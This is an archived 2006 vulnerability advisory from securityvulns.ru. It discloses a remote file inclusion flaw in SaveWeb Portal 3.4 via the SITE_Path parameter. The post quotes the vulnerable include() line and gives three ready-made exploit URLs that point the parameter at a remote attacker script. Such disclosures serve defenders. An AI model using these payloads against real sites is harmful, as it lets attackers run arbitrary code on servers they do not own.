Computer Security

Security Advisory: SaveWeb Portal 3.4 <- (SITE_Path) Remote File Inclusion Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  CMSimple Cross Site Scripting

  Kayako eSupport <= 2.3.1 (subd) Remote File Inclusion Vulnerability:

  Vwar v1.5.0 <= Sql Injection and XSS vuln.

  [Full-disclosure] [DRUPAL-SA-2006-011] Drupal 4.7.3 / 4.6.9 fixes XSS issue

From:x0r0n_(at)_hotmail.com <x0r0n_(at)_hotmail.com>
Date:03.08.2006
Subject:SaveWeb Portal 3.4 <- (SITE_Path) Remote File Inclusion Vulnerability

///////////////////CYBER-WARRiOR.
ORG\\\\\\\\\\\\\\\\
\\\\\

#SaveWeb Portal 3.4 <- (SITE_Path) Remote File Inclusion Vulnerability     

-

#Author: xoron

-

#script: SaveWeb Portal

-

#Class : Remote

-

#cont@ct: x0r0n[at]hotmail[dot]com

-

#CODE:    include($SITE_Path."poll/poll.php")

-

#Exploit:
http://www.site.com/[path]/menu_dx.php?SITE_Path=http://evil_scripts?
http://www.site.com/[path]/poll/poll.php?SITE_Path=http://evil_scripts?
http://www.site.com/[path]/poll/view_polls.php?SITE_Path=http://evil_scripts?

-

#Thanx : WWW.CYBER-WARRiOR.ORG

-

#Greetz: DJR, x-mastER, LASTSCREAM , zip72_72, R3D4C!D and all cyber-warrior users.

///////////////////CYBER-WARRiOR.
ORG\\\\\\\\\\\\\\\\
\\\\\
    
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server